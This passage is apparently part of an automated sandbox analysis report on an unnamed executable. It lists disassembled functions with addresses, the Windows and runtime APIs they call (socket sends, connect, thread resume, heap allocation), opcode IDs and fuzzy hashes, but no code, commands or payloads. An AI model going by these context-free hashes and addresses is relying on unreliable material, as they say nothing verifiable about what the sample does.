                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6e7cbe3b3945489250c6ffed3a06d5de9098a946e2ae5d11fe28fa84d0b631fe
                                                                                                                                                        • Instruction ID: e32795fc2373a1baa30d598f7e8e4a4094cc23e70d160b716c3c012fa2b5d7a1
                                                                                                                                                        • Opcode Fuzzy Hash: 6e7cbe3b3945489250c6ffed3a06d5de9098a946e2ae5d11fe28fa84d0b631fe
                                                                                                                                                        • Instruction Fuzzy Hash: D3F0247020020459DB6CDE38CC5466A37895B01324B204B3FF82EC65C2DB74D98C8208
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041429F, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __Thrd_start.LIBCPMT ref: 004142AE
                                                                                                                                                          • Part of subcall function 0057A79A: std::_Throw_Cpp_error.LIBCPMT ref: 0057A7C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cpp_errorThrd_startThrow_std::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1816819587-0
                                                                                                                                                        • Opcode ID: 73882538f6bdff0b6b471165b4ed91e7b7221f71a5e7dea40f44ed8922e14ddf
                                                                                                                                                        • Instruction ID: 1711f41c4229daadd3af8df59cb51dedd6112632dc40eb4914f8a2173c77e902
                                                                                                                                                        • Opcode Fuzzy Hash: 73882538f6bdff0b6b471165b4ed91e7b7221f71a5e7dea40f44ed8922e14ddf
                                                                                                                                                        • Instruction Fuzzy Hash: D3E0D8311002517ADA2D1221AC079EB7F84DBC0760B14807FF54A50452DA6DDCD16649
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041F53B, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041F540
                                                                                                                                                        • new.LIBCMT ref: 0041F549
                                                                                                                                                          • Part of subcall function 0041F572: __EH_prolog.LIBCMT ref: 0041F577
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: 72f65d3733cd1816bf3482122c7b8fc5b7e0524313d44bd45335048aa942ff10
                                                                                                                                                        • Instruction ID: aaa59f0a5d1e18cd059850cc56492db9f86fd8dc6bf88d88e6f0664946d78b44
                                                                                                                                                        • Opcode Fuzzy Hash: 72f65d3733cd1816bf3482122c7b8fc5b7e0524313d44bd45335048aa942ff10
                                                                                                                                                        • Instruction Fuzzy Hash: DBE08670940605ABEB08AF94D8167AD7B66EB00310F10436DB425561D1DB740F408744
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041669D, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: fc1b44fa2652a77515b32c56ff951fb98f229cd1dd70937fbea40c6ec28d829d
                                                                                                                                                        • Instruction ID: 8d787526a4bf0b24d3d87e9b2ccb446cbac1e89f66f431e90f9ce25a14d51f2a
                                                                                                                                                        • Opcode Fuzzy Hash: fc1b44fa2652a77515b32c56ff951fb98f229cd1dd70937fbea40c6ec28d829d
                                                                                                                                                        • Instruction Fuzzy Hash: E131CF32900609DFCB01DF68C8406EFBBB1AF45324F11821EF8796B291C779AA46CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004123B2, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: 512881a1ece207372955a4204b135b8466ef0a5d4e3e70ea8eb73ce178d58f02
                                                                                                                                                        • Instruction ID: e8f8d7a5964f2b445040bfcb06dc4bdd39b919295e06a621ade6c61c4dbfe788
                                                                                                                                                        • Opcode Fuzzy Hash: 512881a1ece207372955a4204b135b8466ef0a5d4e3e70ea8eb73ce178d58f02
                                                                                                                                                        • Instruction Fuzzy Hash: CC210571A003159BDB24DF68CA507EEB7B5EB40720F20062EE961E73C2C3B46A9587D9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041EED8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: 4d15fca86e0c5606598e5f9bd5bddd8da3e85dee407018ee59cb783fa558d344
                                                                                                                                                        • Instruction ID: fe63a4850e38163b597c6e3990eaf3730cf34859dc978af65c5c2bfcf8551836
                                                                                                                                                        • Opcode Fuzzy Hash: 4d15fca86e0c5606598e5f9bd5bddd8da3e85dee407018ee59cb783fa558d344
                                                                                                                                                        • Instruction Fuzzy Hash: 5931E0B1904209DFCB14DF98C5859DEBBF8FF09320F20866EE459E7291D7349A44CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041EA75, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041EA7A
                                                                                                                                                          • Part of subcall function 0041EED8: __EH_prolog.LIBCMT ref: 0041EEDD
                                                                                                                                                          • Part of subcall function 0041B618: __EH_prolog.LIBCMT ref: 0041B61D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: 4bfb908e6eaf34015ecca621b83a2dda6df74b2048ffbd402ca78b6208732579
                                                                                                                                                        • Instruction ID: 5b0730db0a22c4c3ed54843ca7c9fbf6e0b11cb2f2d9f97c1fe575d98ca53840
                                                                                                                                                        • Opcode Fuzzy Hash: 4bfb908e6eaf34015ecca621b83a2dda6df74b2048ffbd402ca78b6208732579
                                                                                                                                                        • Instruction Fuzzy Hash: B1318B71900708DFDB14EF75C445BEEFBA5EF54304F00881EE5AA97281CB346A44CB95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415DFD, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • setsockopt.WS2_32(?,0000FFFF,?,?,00000004), ref: 00415E88
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: setsockopt
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3981526788-0
                                                                                                                                                        • Opcode ID: 6a1f621b066d8668c018bf0f4c4155febe04ebc05f09ad2f924c342e56b57d2a
                                                                                                                                                        • Instruction ID: 592d82914d04d7fa13f1e3935c6b9e86e56259bfc900ae1ad2c8ce19fa2d334b
                                                                                                                                                        • Opcode Fuzzy Hash: 6a1f621b066d8668c018bf0f4c4155febe04ebc05f09ad2f924c342e56b57d2a
                                                                                                                                                        • Instruction Fuzzy Hash: 0511D032A04B56DBCF218F14C8405EB7BA4AF65761F10452BF9559B280C779EDD0CBCA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041496B, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 004149CB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalDeleteSection
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 166494926-0
                                                                                                                                                        • Opcode ID: 189e7d347e9017f12ec0a5919b57040333f7d146fc612c05d702a62bceb6a313
                                                                                                                                                        • Instruction ID: 5db7d3939c8b5eaf97030123963db2762d5fa0df23491b415197f97b442585dc
                                                                                                                                                        • Opcode Fuzzy Hash: 189e7d347e9017f12ec0a5919b57040333f7d146fc612c05d702a62bceb6a313
                                                                                                                                                        • Instruction Fuzzy Hash: 4B11CBB2601B10DFC724CF59D444B9BB7A8EF49B20F11065EE916AB790CB38AC408BC8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415C68, Relevance: 1.6, APIs: 1, Instructions: 50networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00415C80
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Send
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 121738739-0
                                                                                                                                                        • Opcode ID: 0c39d6f4156c4a9690110e2fc22901fc1627de72b2a5eb2a8544b6d6f002fe50
                                                                                                                                                        • Instruction ID: 9a724b95f79d0ccb74c9740def4087d0230b39b36d48272c1a0fdd1c18be81e1
                                                                                                                                                        • Opcode Fuzzy Hash: 0c39d6f4156c4a9690110e2fc22901fc1627de72b2a5eb2a8544b6d6f002fe50
                                                                                                                                                        • Instruction Fuzzy Hash: 5A01D4B1A00709EFDB109F55C8808FAFB6DFB947A4710412BF81893340E7749D5087E5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C5040, Relevance: 1.5, APIs: 1, Instructions: 42threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ResumeThread.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,004E5D41), ref: 005C50A3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                        • Opcode ID: cb86c64cf0bc49906b9a0c482c01881277321049da08d2e63d8ff08467a0588c
                                                                                                                                                        • Instruction ID: b560e6fb1e654ddaea85a8769d39945d8cebf43512de28bcb0c0168283f6befe
                                                                                                                                                        • Opcode Fuzzy Hash: cb86c64cf0bc49906b9a0c482c01881277321049da08d2e63d8ff08467a0588c
                                                                                                                                                        • Instruction Fuzzy Hash: 6DF0B4717001201AD920B3B6AC1BFAE2659DB90724F05403EF40FAB6D6DEFC698685AD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069CECA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006973D2: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00697413
                                                                                                                                                        • _free.LIBCMT ref: 0069CEEA
                                                                                                                                                          • Part of subcall function 0069742F: RtlFreeHeap.NTDLL(00000000,00000000,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?), ref: 00697445
                                                                                                                                                          • Part of subcall function 0069742F: GetLastError.KERNEL32(?,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?,?), ref: 00697457
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 314386986-0
                                                                                                                                                        • Opcode ID: 32284261e85a4efb79999410351610abb0aa5637ed3948a8831d00f8e7772a9c
                                                                                                                                                        • Instruction ID: 870a774ea7d3aaf37dbb3cc03b09263d9606039e2328adeadc01f5b5c429fec2
                                                                                                                                                        • Opcode Fuzzy Hash: 32284261e85a4efb79999410351610abb0aa5637ed3948a8831d00f8e7772a9c
                                                                                                                                                        • Instruction Fuzzy Hash: B4F03C72A04209AFC750DF69D442B9ABBF8FB48720F10416AED18E7741E771A9108BD5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041D1F6, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041D1FB
                                                                                                                                                          • Part of subcall function 0041F0C9: __EH_prolog.LIBCMT ref: 0041F0CE
                                                                                                                                                          • Part of subcall function 0041EA75: __EH_prolog.LIBCMT ref: 0041EA7A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: d2396fcb84d8ff267c7d74de8419c52d6c8e67c2b90bb5a6989fc1192a853abb
                                                                                                                                                        • Instruction ID: 720c8abf6b3a623fc18666556a0d67ae755b3cc3777e772e428a5fe24dc0e369
                                                                                                                                                        • Opcode Fuzzy Hash: d2396fcb84d8ff267c7d74de8419c52d6c8e67c2b90bb5a6989fc1192a853abb
                                                                                                                                                        • Instruction Fuzzy Hash: 2F017872A01108EFDB04EFA9D905AEEFBB9FF48324F10815EE401A3291CB756B45CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006973D2, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00697413
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 4f877a8d87a716c2326b090c0abd7a7843dab70259e51459aa8e06c997e83765
                                                                                                                                                        • Instruction ID: 1f6a5d01b21c0fd894ec79396150fcf336aa37edfcf09a0212d865130efe5741
                                                                                                                                                        • Opcode Fuzzy Hash: 4f877a8d87a716c2326b090c0abd7a7843dab70259e51459aa8e06c997e83765
                                                                                                                                                        • Instruction Fuzzy Hash: 05F0E03162952467DF216A219C05F973F9FAF50BA0B158421FD05DAE41DB20DC1245E0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041B618, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: eaa27ee7ce3b9304f5456c7da0364159dae65053c83cd0c7620695ef1e572bd7
                                                                                                                                                        • Instruction ID: 4b0a7df359b27d7deb2a5b517f0b8da2aa001c86551ddee930004eb691111233
                                                                                                                                                        • Opcode Fuzzy Hash: eaa27ee7ce3b9304f5456c7da0364159dae65053c83cd0c7620695ef1e572bd7
                                                                                                                                                        • Instruction Fuzzy Hash: B0F049F191121AABD7109F59D9418AAFFA9FF64760B10822BB51893250D7715A10CBE4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00697D9E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000003,00000003), ref: 00697DD0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 6cfb262724f3d3dc114560e7e6d4e7d7c6529226fdafa8203e455a43d015d619
                                                                                                                                                        • Instruction ID: 02dbf130daba63d49ff466732518eb3c32f2a04780a255b5738294c68bc289d6
                                                                                                                                                        • Opcode Fuzzy Hash: 6cfb262724f3d3dc114560e7e6d4e7d7c6529226fdafa8203e455a43d015d619
                                                                                                                                                        • Instruction Fuzzy Hash: 66E02B311296156EDF313A255D00BFB3B6FDF813B0F090122EC0996EC1CB10CC0485E8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004A8E57, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00422C2A: new.LIBCMT ref: 00422C60
                                                                                                                                                          • Part of subcall function 00422C2A: std::locale::_Init.LIBCPMT ref: 00422C6A
                                                                                                                                                          • Part of subcall function 004A9AFE: __EH_prolog.LIBCMT ref: 004A9B03
                                                                                                                                                        • std::ios_base::_Addstd.LIBCPMT ref: 004A8E96
                                                                                                                                                          • Part of subcall function 00422B03: __EH_prolog.LIBCMT ref: 00422B08
                                                                                                                                                          • Part of subcall function 00422B03: __CxxThrowException@8.LIBVCRUNTIME ref: 00422B2E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$AddstdException@8InitThrowstd::ios_base::_std::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2564750599-0
                                                                                                                                                        • Opcode ID: 6f5522c1c9eeb18aaa8e955b6a7881d6c507de60ff235f494b4ea693d3cb3b0d
                                                                                                                                                        • Instruction ID: e8c6b4643be6486736da30038d08bc6f4130dc9442f5279e29b39069d556d153
                                                                                                                                                        • Opcode Fuzzy Hash: 6f5522c1c9eeb18aaa8e955b6a7881d6c507de60ff235f494b4ea693d3cb3b0d
                                                                                                                                                        • Instruction Fuzzy Hash: 73F0A7312043546BE724BA66A449B5B7BD8EB11334F10440FF58647B82DAF9F840C794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004A9AFE, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004A9B03
                                                                                                                                                          • Part of subcall function 00422BB8: __EH_prolog.LIBCMT ref: 00422BBD
                                                                                                                                                          • Part of subcall function 004AA0C8: __EH_prolog.LIBCMT ref: 004AA0CD
                                                                                                                                                          • Part of subcall function 004AA0C8: std::_Lockit::_Lockit.LIBCPMT ref: 004AA0DC
                                                                                                                                                          • Part of subcall function 004AA0C8: std::locale::_Getfacet.LIBCPMT ref: 004AA0FC
                                                                                                                                                          • Part of subcall function 004AA0C8: std::_Lockit::~_Lockit.LIBCPMT ref: 004AA156
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Lockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3055501177-0
                                                                                                                                                        • Opcode ID: e545babe555914f8faf80a4230c38f233aff325388de5fabf3a006c8233d6073
                                                                                                                                                        • Instruction ID: 4b4e7e136601db2bbeaaab1686e08f6e214523d7111080314e64cf060046e2f1
                                                                                                                                                        • Opcode Fuzzy Hash: e545babe555914f8faf80a4230c38f233aff325388de5fabf3a006c8233d6073
                                                                                                                                                        • Instruction Fuzzy Hash: 47E03771940118EBDB14EFA4E905AAEBB69EF54311F10465EF40593191DB345F44CAA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415A24, Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: connect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1959786783-0
                                                                                                                                                        • Opcode ID: 3fefd9f540633eb30b3698a76202bb7f5cd4ec7936f625b77c56b3b960efcf26
                                                                                                                                                        • Instruction ID: 2acf2c692f55a5b861b11f6723e36befb60b0f762cc8b4f079354badfdef04c0
                                                                                                                                                        • Opcode Fuzzy Hash: 3fefd9f540633eb30b3698a76202bb7f5cd4ec7936f625b77c56b3b960efcf26
                                                                                                                                                        • Instruction Fuzzy Hash: AEE08632640914A74A102AB86C918F937598F847797008316BB3D4A3D0CA34DD504294
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041EDE6, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041EDEB
                                                                                                                                                          • Part of subcall function 004142E3: std::_Cnd_initX.LIBCPMT ref: 004142E9
                                                                                                                                                          • Part of subcall function 004142E3: __Cnd_signal.LIBCPMT ref: 004142F5
                                                                                                                                                          • Part of subcall function 004142E3: std::_Cnd_initX.LIBCPMT ref: 0041430A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cnd_initstd::_$Cnd_signalH_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3262714529-0
                                                                                                                                                        • Opcode ID: bf91094cce2af99d57b9192d901cbda98ef3c8e51d643aae989a4339f1248000
                                                                                                                                                        • Instruction ID: 86a23be5b3e70d79fa78b63793554b73666ca2c1f11df9004a0eab4831b94d5d
                                                                                                                                                        • Opcode Fuzzy Hash: bf91094cce2af99d57b9192d901cbda98ef3c8e51d643aae989a4339f1248000
                                                                                                                                                        • Instruction Fuzzy Hash: EAE09271814315DBEB14AF5494067DE77B4EF04336F20068EF0646A181CB7516418798
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00410899, Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WSAStartup.WS2_32(00000002,00000002), ref: 004108BC
                                                                                                                                                        Memory Dump Source
